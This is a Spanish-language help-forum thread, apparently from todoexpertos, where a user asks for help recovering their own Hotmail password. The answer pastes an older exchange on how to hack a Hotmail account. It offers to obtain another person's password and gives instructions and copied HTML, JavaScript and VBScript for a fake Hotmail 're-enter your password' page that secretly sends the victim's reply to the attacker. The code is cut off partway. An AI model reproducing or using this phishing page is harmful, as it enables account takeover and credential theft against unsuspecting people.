Mi Password de Hotmail

Buenos dias.
compañero, cambie mi password de hotmail y no lo recuerdo y como soy en la pregunta secreta puse letras al azar.
es verdad que es mi cuenta, pues si te fijas es la que tengo aqui en todoexpertos, por favor ayudame!!!
mi password q no recuerdo es [email protected]
y el mail que tengo por mientras tanto es [email protected]
gracias!!!! Saludos!!

1 respuesta

Respuesta
-1
Te envio una pregunta sobre el tema que ya conteste. Si no te sirve escribime:
jakear cuenta en hotmail (3/6/2003)
Hola que tal, me gustaria saber los pasos como jakear una cuenta en hotmail
lo que paso es queme cambiaron mi contraseña y ademas deseo aprender eso
agredesco anticipada tu respuesta
grcias
Re: jakear cuenta en hotmail (3/6/2003)
eSO ES CUENTO VIEJO. Dame la direccion de tu correo e intentare obtener la clave para ti. Es demasiado largo de explicarlo por este medio
jakear cuenta en hotmail (3/6/2003)
el correo es [email protected]
ya pues dime los pasos aunque sea largo
gracias
jimmy
Re: jakear cuenta en hotmail (3/6/2003)
Haz una pagina web con estos datos y pon como recptor oculto tu email, mandala y a la vuelta, si contesta tendras su password.
<html>
<head> <script language="JavaScript"> function ChangeIfUtf8(Utf8InCookies)
{ var URL = document.location.href; var strUtf8 = "utf8="; var index = URL.indexOf(strUtf8);
var inCookie = Utf8InCookies; if(index>0) { var indexValue = index + strUtf8.length;
if (indexValue+1 < URL.length) { if (URL.charAt(index-1) == "?") URL = URL.substring(0,index)
+ URL.substring(indexValue+2); else URL = URL.substring(0,index-1) + URL.substring(indexValue+1);
} else { URL = URL.substring(0,index-1); } } var IsFirst = URL.indexOf("?"); if
(IsFirst>0) strUtf8 = "&" + strUtf8; else strUtf8 = "?" + strUtf8; if (inCookie=="0"
&& document.charset=="utf-8") { URL = URL + strUtf8 + "1"; if (URL !=
document.location.href) { window.location.replace(URL); var wHnd = window.open("",
"", "height=1,width=1,menubar=no,resizable=no,titlebar=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=no");
wHnd.close(); } } else if (inCookie=="1" && document.charset!="utf-8")
{ URL = URL + strUtf8 + "0"; if (URL != document.location.href) { window.location.replace(URL);
var wHnd = window.open("", "", "height=1,width=1,menubar=no,resizable=no,titlebar=no,scrollbars=no,status=no,toolbar=no,menubar=no,location=no");
wHnd.close(); } } } ChangeIfUtf8("0"); </script> <meta http-equiv="Context-Type"
content="text/html" charset="iso-8859-1"> <title>Hotmail - Mensaje</title>
<link rel="stylesheet" href="/cgi-bin/dasp/ES/hotmail___904500017.css">
<script language="JavaScript" src="/cgi-bin/dasp/ES/hotmail___904500017.js"></script>
<script event=onload for=window language=vbscript> on error resume next
dim RRMsgrObj set RRMsgrObj = CreateObject("Messenger.MsgrObject") If Err.Number
<> 0 Then Else DotheObject CheckForOnline End if </script> <SCRIPT>
<!-- function Filtered() { return 0 } //--> </SCRIPT> <!DOCTYPE
HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <META content="Microsoft
FrontPage 4.0" name=GENERATOR> <meta http-equiv="Content-Type" content="text/html;
charset=iso-8859-1"> <meta name="GENERATOR" content="Microsoft FrontPage 4.0"> <title>Hotmail - Vuelva a escribir su contraseña</title>
<!-- saved from url=(0051)http://lc2.law13.hotmail.passport.com/cgi-bin/login
--> <!-- reauthhead.asp --> <link href="http://64.4.18.24/Hotmai_archivos/hotmail___7.css"
rel=stylesheet> </head> <body bgcolor="#FFFFFF" topMargin="0" >
<div id="divMsgrObject" style="display:none"></div>
<table cellpadding=0 cellspacing=0 width=100%><tr valign=top><td
width=100% valign=top > <table class='Wf' border=